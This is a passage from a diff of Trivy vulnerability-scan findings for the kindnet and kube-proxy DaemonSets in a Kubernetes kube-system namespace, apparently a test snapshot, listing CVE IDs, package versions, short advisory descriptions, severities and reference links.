"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: x/net/html: infinite loop in ParseFragment", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33194", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33194", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - }, - { - "type": "URL", - "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://go.dev/cl/311090", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://go.dev/issue/46288", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0238", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", + "references": [ + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", + ], + }, + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", + "references": [ + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", + ], + }, + "category": "Vulnerability", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.pcre.org/original/changelog.txt", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + 